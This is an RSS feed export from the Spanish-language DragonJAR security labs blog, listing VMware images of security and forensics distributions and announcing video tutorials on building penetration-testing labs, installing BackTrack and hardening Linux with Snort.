<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; VMWare</title>
	<atom:link href="http://labs.dragonjar.org/tag/vmware/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Recopilación de Máquinas Virtuales para VMWare Player, WorkStation y Server como entornos de uso para Laboratorios de Seguridad</title>
		<link>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad</link>
		<comments>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad#comments</comments>
		<pubDate>Fri, 29 May 2009 19:53:12 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Entornos virtualizados]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Sistemas Operativos]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VMWare Tools]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=797</guid>
		<description><![CDATA[El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (PenTesting, Análisis de Malware, Hardening, Protección y Análisis de Datos, etc.) Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas &#8220;atacantes&#8221;  y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (<a href="http://labs.dragonjar.org/tag/penetration-testing" target="_blank">PenTesting</a>, <a href="http://labs.dragonjar.org/tag/analisis-de-malware" target="_blank">Análisis de Malware</a>, <a href="http://labs.dragonjar.org/tag/hardening" target="_blank">Hardening</a>, <a href="http://labs.dragonjar.org/taller-tecnicas-criptograficas-introduccion-y-contenido" target="_blank">Protección y Análisis de Datos</a>, etc.)</p>
<p style="text-align: justify;">Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas &#8220;atacantes&#8221;  y máquinas &#8220;víctimas&#8221;.</p>
<p style="text-align: justify;">Están desarrolladas para ser utilizadas con cualquiera de los productos de <a href="http://www.vmware.com" target="_blank">VMWare</a>. Recomiendo el uso de <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a> y <a href="http://www.vmware.com/products/server/" target="_blank">Server</a> como solución al tema de licenciamiento, aunque es posible utilizar <a href="http://www.vmware.com/products/ws/" target="_blank">VMWare WorkStation</a> en modo Trial por 30 días. Todas estos entornos ya traen instaladas las <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server" target="_blank">VMWare Tools</a> para facilitar la transferencia de datos entre uno y otro sistema.</p>
<p style="text-align: justify;">Pronto publicaré otras máquinas virtuales para otras soluciones de virtualización (Virtual PC, Qemu, Virtual Box).</p>
<p style="text-align: justify;"><strong>Imágenes tomadas de <a href="http://bagside.com/bagvapp/index.html" target="_blank">BagSide</a>:</strong></p>
<ul style="text-align: justify;">
<li><strong>BackTrack 4 beta (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Back|Track 4 beta, with KDE 3.5.10 Desktop and Kernel 2.6.28.1. Now based on Ubuntu Intrepid. Loads of specialized applications for admins. VMwareTools 7.8.4-126130 installed along with SLIM Login manager, some extra scripts and the gtk-qt-engine. Released 11th Feb. 2009. The appliance occupies 4.2GB of the virtual disk which is 25GB in total. Default RAM is set at 688MB and the download is 839 MB. Regarded as one of the top Security distros.</li>
<li><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">Página oficial de BackTrack.</a></li>
<li><a href="http://174.36.1.2/bt4.7z" target="_blank">Descargar máquina virtual.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>BackTrack 3 (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li><a href="http://174.36.1.2/bt3.7z" target="_blank">Descargar máquina virtual BackTrack 3.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Caine / Computer Aided INvestigative Environment (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>CAINE (Computer Aided INvestigative Environment) is a GNU/Linux Digital Forensics distro for Interdepartment Center for Research on Security (CRIS), supported by the University of Modena and Reggio Emilia in Italy. Based on Ubuntu 8.04.1 with Kernel 2.6.24-24 and GNOME 2.22.3. Fully updated on the 2nd of March 2009. Released on the 22nd of Feb. 2009. The dynamic disk is 40GB and the appliance occupies 3.5GB installed and the download is 683 MB. 588 MB RAM is allocated as default.</li>
<li><a href="http://www.caine-live.net/" target="_blank">Página Oficial de Caine.</a></li>
<li><a href="http://174.36.1.2/caine05.7z" target="_blank">Descargar máquina virtual Caine.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Helix 2008R1 (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Ubuntu 8.04 based Incident Response. Discovery, Forensics and Security Distro<br />
Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on the 03/10/2008. The source and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 23/09/2008. The appliance occupies 2.8GB of the virtual disk which is 14GB in total. Default RAM is set at 568MB and the download is 708MB in total. Works well here. For those of you who wants to use or try applications like Adepto, Autopsy, GtkHash, Linen, Ophcrack etc.</li>
<li><a href="http://www.e-fense.com/helix/" target="_blank">Página oficial de Helix.</a></li>
<li><a href="http://174.36.1.2/helix.7z" target="_blank">Descargar máquina virtual Helix.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>nUbuntu (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Ubuntu 8.10 remaster loaded with Security tools for Bluetooth, Cisco, Scanners, Password, Exploits, Database, Fuzzers, Enum, VoiP and Wireless. Some build-tools and VMwareTools 7.8.4-125130 are installed. Release date 17/12/2008. The physical disk is 9GB whereoff 2.7 GB is used for the appliance. The download is 566 MB and RAM set at 548 MB.</li>
<li><a href="http://www.nubuntu.org/" target="_blank">Página oficial de nUbuntu.</a></li>
<li><a href="http://174.36.1.2/nub.7z" target="_blank">Descargar máquina virtual nUbuntu.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Samurai Web Testing Framework (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Security and web penetration test suite based on Ubuntu 8.04<br />
Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on 08/10/2008. Headers and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 10/08/1008. The appliance occupies 3.0GB of the virtual disk which is 14GB in total. Default RAM is set at 548MB and the download is 675MB in total. Works well here. Loaded with intrusion tools: DirBuster, Fierce Domain Scanner, Gooscan, Grendel-Scan, HTTP_Print fingerprinting tool, Maltego CE, Nikto, Paros, Rat Proxy, Spike Proxy , SQLBrute, w3af (and the GUI), Wapiti, WebScarab, WebShag, ZenMap, dnswalk, httping, httrack, john the ripper, netcat, nmap, siege, snarf etc.</li>
<li><a href="http://samurai.inguardians.com/" target="_blank">Página oficial de Samurai Web Testing Framework.</a></li>
<li><a href="http://174.36.1.2/samurai.7z" target="_blank">Descargar máquina virtual Samurai Web Testing Framework.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>WeakNet Linux (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Security distro from WeakNetLabs. Based on Ubuntu 8.04.1 with Kernel 2.6.24-21 and GNOME 2.22.3. Fully updated on the 22nd of November. Released on the 20th of November 2008. Substantial amount of security tools including WeakNetLabs own code and a &#8216;dashboard&#8217; with main applications. The dynamic disk is 20GB and the appliance occupies 3.6GB installed and the download is 848 MB. 612 MB RAM is allocated as default.</li>
<li><a href="http://weaknetlabs.com/linux/" target="_blank">Página oficial de WeakNet Linux.</a></li>
<li><a href="http://174.36.1.2/weaknet.7z" target="_blank">Descargar máquina virtual Weaknet.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>CentOS (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Red Hat Enterprise based with GNOME 2.16 desktop. Installed kernel-devel, cpp, gcc, build-tools and VMwareTools 7.8.4-126130, Adobe flash plugin, Yum-extender, Yum-utils and gtk-murrine-engine and some iconsets. Release date 31/03/2009. CentOS is ranked no.10 on Distrowatch. The physical disk is 40GB whereoff 4.1 GB i used for the appliance. The download is 813MB. Very mature and stable although not bleeding edge.</li>
<li><a href="http://www.centos.org/" target="_blank">Página oficial de CentOS.</a></li>
<li><a href="http://174.36.1.2/centos52.7z" target="_blank">Descargar máquina virtual CentOS.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>FreeBSD (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Standard with the following added, Opera 9.63, MySQL Server Client, Ruby, Apache, Ark, compat6, Nano and a few more plus VMwareTools. Occupies 4.5 GB on disk off a virtual dynamic disk of 20 GB. 644 MB RAM allocated and the download is 904 MB. Works here after some serious tweaking and fixing. I must say that I have still problems getting to grips with all BSD&#8217;s as VMware guest OS desktops although this is probably the best one I have built so far.</li>
<li><a href="http://www.freebsd.org/es/" target="_blank">Página oficial de FreeBSD.</a></li>
<li><a href="http://174.36.1.2/freebsd.7z" target="_blank">Descargar máquina virtual FreeBSD.</a></li>
</ul>
</li>
</ul>
<p><strong>Imágenes tomadas de <a href="http://www.vmware.com/appliances/" target="_blank">Virtual Appliance Marketplace</a>:</strong></p>
<ul style="text-align: justify;">
<li><strong>Astaro Mail / Web / Security Gateway </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Astaro Mail Gateway provides complete protection and control over spam, viruses, worms and Trojans transferred through email. The All-In-One mail security appliance features comprehensive features for spam detection and malware filtering.</li>
<li>Astaro Web Gateway provides complete protection and control over data transferred over the web. The All-In-One web security appliance features Malware Detection, Application Control, URL Filtering and Bandwidth Management, fully integrated and manageable through a single and intuitive browser-based user interface.</li>
<li>Astaro Security Gateway integrates complete Network, Web and Mail Security through an intuitive browser-based user interface. The Astaro Unified Threat Management appliance is the most easy-to-use and cost-effective &#8220;all-in-one&#8221; solution available, working to effectively shield businesses from internet based threats everyday.</li>
<li><a href="http://www.astaro.com/" target="_blank">Página oficial de Astaro Mail Gateway.</a></li>
<li><a href="ftp://ftp.astaro.de/pub/AMG/v7/virtual_appliance/" target="_blank">Descargar Astaro Mail gateway.</a></li>
<li><a href="ftp://ftp.astaro.de/pub/AWG/v7/virtual_appliance/" target="_blank">Descargar Astaro Web Gateway.</a></li>
<li><a href="ftp://ftp.astaro.com/pub/Astaro_Security_Gateway/v7/virtual_appliance/" target="_blank">Astaro Security Gateway.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>WiKID Strong Authentication Server Community Edition 3.3.8 </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens.</li>
<li><a href="http://www.wikidsystems.com/support/wikid-support-center/faq/whats-the-difference-between-the-community-release-and-enterprise-release/" target="_blank">Página oficial de WiKID Strong Authentication Server Community Edition.</a></li>
<li><a href="https://sourceforge.net/project/showfiles.php?group_id=144774&amp;package_id=321765" target="_blank">Descargar máquina virtual WiKID Strong Authentication Server Community Edition.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Accellion Secure File Transfer </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Secure File Transfer Virtual Appliance &#8211; secure, economical and easy to use secure file transfer for today&#8217;s global enterprises.</li>
<li><a href="http://www.accellion.com/" target="_blank">Página oficial de Accellion Secure File Transfer.</a></li>
<li><a href="http://www.accellion.com/virtual-greenex.html" target="_blank">Descargar máquina virtual  Accellion Secure File Transfer.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>ShellNET MiniVM </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Web Interface for managing Nessus Vulnerability Scans and results.</li>
<li><a href="http://turtleshell.net/" target="_blank">Página oficial de ShellNET MiniVM.</a></li>
<li><a href="http://turtleshell.net/index.php?option=com_remository&amp;Itemid=43&amp;func=startdown&amp;id=4" target="_blank">Descargar máquina virtual ShellNET MiniVM.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>JanusVM </strong><strong>(Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Internet Privacy Appliance :: Encrypts your Internet traffic, hides your IP address, and is easy to setup.</li>
<li><a href="http://www.janusvm.com/" target="_blank">Página oficial de<strong> </strong>JanusVM<strong>.</strong></a></li>
<li><a href="http://www.janusvm.com/download.html" target="_blank">Descargar máquina virtual <strong> </strong>JanusVM.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>OWASP Live CD (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>The overarching goal for this project is to make application security tools and documentation easily available. I see this as a great complement to OWASP&#8217;s goal to make application security visible.</li>
<li><a href="http://www.owasp.org/index.php/LiveCD" target="_blank">Página oficial de OWASP Live CD.</a></li>
<li><a href="http://mtesauro.com/files/owasp-livecd-AustinTerrier-Feb2009.vmdk.rar" target="_blank">Descargar máquina virtual de OWASP Live CD.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Fireball ISO Builder </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Fireball ISO Builder is a VMWare virtual appliance that builds a bootable Gentoo Linux-base ISO image, focused on providing security and networking services to a network. IPv4 and IPv6. go6.net tunnel broker. DHCP, DNS, SSHD services.</li>
<li><a href="http://fireballiso.sourceforge.net/" target="_blank">Página oficial de Fireball ISO Builder.</a></li>
<li><a href="http://sourceforge.net/project/downloading.php?group_id=254850&amp;filename=FireballRelease1.7z" target="_blank">Descargar máquina virtual de Fireball ISO Builder.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Nepenthes VMware Appliance (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate known vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to Resolve DNS Asynchronous, Emulate Vulnerabilities, Download Files, Submit the Downloaded Files, Trigger Events, Shellcode Handler.</li>
<li><a href="http://www.dalmatech.com/" target="_blank">Página oficial de Nepenthes VMware Appliance.</a></li>
<li><a href="http://www.dalmatech.com/downloads/Nepenthes.20.zip" target="_blank">Descargar máquina virtual Nepenthes.</a></li>
</ul>
</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Hardening básico de GNU/Linux e instalación y configuración básica de Snort</title>
		<link>http://labs.dragonjar.org/hardening-basico-de-gnulinux-e-instalacion-y-configuracion-basica-de-snort</link>
		<comments>http://labs.dragonjar.org/hardening-basico-de-gnulinux-e-instalacion-y-configuracion-basica-de-snort#comments</comments>
		<pubDate>Thu, 26 Feb 2009 03:49:35 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hardening]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Aseguramiento]]></category>
		<category><![CDATA[CentOS]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Snort]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=641</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Veamos ahora el proceso necesario para llevar a cabo un aseguramiento básico de GNU/Linux y el procedimiento de instalación y configuración básica de Snort IDS.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hardening_Linux" src="http://img6.imageshack.us/img6/6528/hardeninglinux.jpg" alt="" width="400" height="269" /></p>
<p style="text-align: justify;">En el siguiente video tutorial veremos el paso a paso de la actualización del sistema, revisión de servicios en el sistema y modo de inicialización de estos, estado de la red (estado de puertos, programas y servicios, etc.), instalación y configuración del servicio SSH, instalación y configuración de MySQL y sus respectivas dependencias que hará el papel de repositorio de información para los Logs y Alert&#8217;s generados por el IDS Snort, instalación y configuración básica de Snort IDS y sus respectivas reglas de detección.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/89514252/65b5b240/Hardening_Linu_instalacion_snort_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial de Hardening básico de GNU/Linux e instalación y configuración básica de Snort</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hardening-basico-de-gnulinux-e-instalacion-y-configuracion-basica-de-snort/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux#comments</comments>
		<pubDate>Thu, 15 Jan 2009 22:11:38 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=519</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Al igual que la sesión anterior, esta muestra como llevar a cabo el proceso de configuración del entorno virtualizado de intrusión bajo Linux y VMWare WorkStation.</p>
<p>En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3iAZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80821521/efcabf57/config_labVirtualLinux_LabsDragonJARorg.html ">Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux</a></strong> (<strong>Password:</strong> www.dragonjar.org) &#8211; <strong>formato del video:</strong> .ogg</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion#comments</comments>
		<pubDate>Wed, 14 Jan 2009 22:48:08 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=510</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez concluída la introducción y luego de dejar claro algunos conceptos podemos comenzar con la configuración de los ambientes virtuales de intrusión.</p>
<div align="center"><img alt="" src="http://img413.imageshack.us/img413/529/penetrationmb0.jpg" title="PenTesting" class="aligncenter" width="450" height="300" /></div>
<p>En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD&#8217;s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (<strong><a href="http://heorot.net/livecds/">De-ICE.net PenTest LiveCDs Project</a></strong>).<br />
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.</p>
<p>En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.</p>
<p><embed src="http://blip.tv/play/Ae3hRZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/80657868/57e3b318/Pentest2_LabsDragonJARorg.html ">Descargar video tutorial de configuración de los ambientes virtuales de intrusión</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Video tutorial: Convertir imágen de una máquina virtual en QEMU a VMWARE</title>
		<link>http://labs.dragonjar.org/video-tutorial-convertir-imagen-de-una-maquina-virtual-en-qemu-a-vmware</link>
		<comments>http://labs.dragonjar.org/video-tutorial-convertir-imagen-de-una-maquina-virtual-en-qemu-a-vmware#comments</comments>
		<pubDate>Fri, 05 Dec 2008 17:48:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[qemu]]></category>
		<category><![CDATA[virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=422</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El siguiente video tutorial muestra todo el procedimiento de conversión de una imágen de una máquina virtual desarrollada en QEMU (dsk) (para este caso, la imágen del sistema virtualizado de intrusión <a href="http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii" target="_blank"><strong>SAURON</strong></a>) al formato de imágen de máquina virtual soportado por VMWare (vmdk).</p>
<p style="text-align: center;"><img class="aligncenter" title="qemu-vmware" src="http://img116.imageshack.us/img116/4759/qemuvmwarekb4.jpg" alt="" width="450" height="432" /></p>
<p style="text-align: justify;"><strong>QEMU:</strong><br />
QEMU es un emulador de procesadores basado en la traducción dinámica de binarios (conversión del código binario de la arquitectura fuente en código entendible por la arquitectura huésped). QEMU también tiene capacidades de virtualización dentro de un sistema operativo, ya sea Linux, Windows, o cualquiera de los sistemas operativos admitidos (de hecho es la forma más común de uso). Esta máquina virtual puede ejecutarse en cualquier tipo de Microprocesador o arquitectura (x86, x86-64, PowerPC, MIPS, SPARC, etc.). Está licenciado en parte con la LGPL y la GPL de GNU.<br />
<a href="http://es.wikipedia.org/wiki/QEMU" target="_blank"><strong>Más información &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><span id="more-422"></span><strong>VMWARE:</strong><br />
VMware Inc., (VM de Virtual Machine) filial de EMC Corporation que proporciona la mayor parte del software de virtualización disponible para ordenadores compatibles X86. Entre este software se incluyen VMware Workstation, y los gratuitos VMware Server y VMware Player. El software de VMware puede funcionar en Windows, Linux, y en la plataforma Mac OS X que corre en procesadores INTEL, bajo el nombre de VMware Fusion. El nombre corporativo de la compañía es un juego de palabras usando la interpretación tradicional de las siglas &#8220;VM&#8221; en los ambientes de computación, como máquinas virtuales (Virtual Machines).<br />
<a href="http://es.wikipedia.org/wiki/VMware" target="_blank"><strong>Más información &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/74616344/65854a/qemu-vmware_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial: Convertir imágen QEMU a VMWARE </strong></a>(<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-convertir-imagen-de-una-maquina-virtual-en-qemu-a-vmware/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Video tutorial de instalación de BackTrack 3</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3#comments</comments>
		<pubDate>Thu, 27 Nov 2008 19:20:10 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Backtrack 3]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=407</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">BackTrack es la herramienta indispensable para casi la totalidad de nuestros laboratorios, y los motivos ya han sido expuestos en muchas oportunidades.</p>
<p style="text-align: center;"><img class="aligncenter" title="backtrack 3" src="http://img232.imageshack.us/img232/8159/bt3qk2.jpg" alt="" width="450" height="355" /></p>
<p style="text-align: justify;">Dejo a continuación una corta definición y el enlace para más información en esta misma página de laboratorios sobre BackTrack.</p>
<p style="text-align: justify;">BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.</p>
<p style="text-align: justify;"><span id="more-407"></span>Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org</p>
<p style="text-align: justify;">(<a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Más información sobre BackTrack</strong></a>)</p>
<p style="text-align: justify;">Ahora publico un video tutorial que he realizado sobre la instalación de BackTrack 3 como sistema base de nuestra máquina.</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/73408823/91de9988/inst_backtrack3_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial de instalación de BackTrack 3 en disco duro</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Netcat</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat#comments</comments>
		<pubDate>Thu, 06 Nov 2008 21:55:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Netcat]]></category>
